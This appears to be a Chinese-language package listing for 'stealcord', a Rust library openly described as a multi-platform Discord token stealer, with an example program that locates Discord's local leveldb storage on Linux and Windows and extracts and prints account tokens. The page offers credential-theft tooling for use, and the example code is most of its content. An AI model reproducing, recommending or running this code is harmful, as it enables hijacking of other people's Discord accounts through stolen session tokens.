1个不稳定版本
0.1.0 | 2023年4月24日 |
---|
在文件系统中排名#1232
5KB
stealcord
用Rust编写的多平台Discord令牌窃取库。
示例
// Import necessary libraries
use simple_home_dir::*;
use stealcord::{get_token, get_tokens};
fn main() {
// Set path to Discord token storage
let path = home_dir().unwrap().join(if cfg!(target_os = "linux") {
// Linux
".config/discord/Local Storage/leveldb/"
} else {
// Windows
"\\AppData\\Roaming\\Discord\\Local Storage\\leveldb"
});
// Get only token
if let Ok(token) = get_token(path.clone()) {
// Print token
println!("{token}")
} else {
// Print error message
panic!("Error getting token")
}
// Get ID : Token
if let Ok(tokens) = get_tokens(path.clone()) {
// Print tokens
println!("{tokens}")
} else {
// Print error message
panic!("Error getting tokens")
}
}
许可证
本项目采用MIT许可证 - 详细信息请参阅LICENSE文件。
依赖项
~1.5MB
~27K SLoC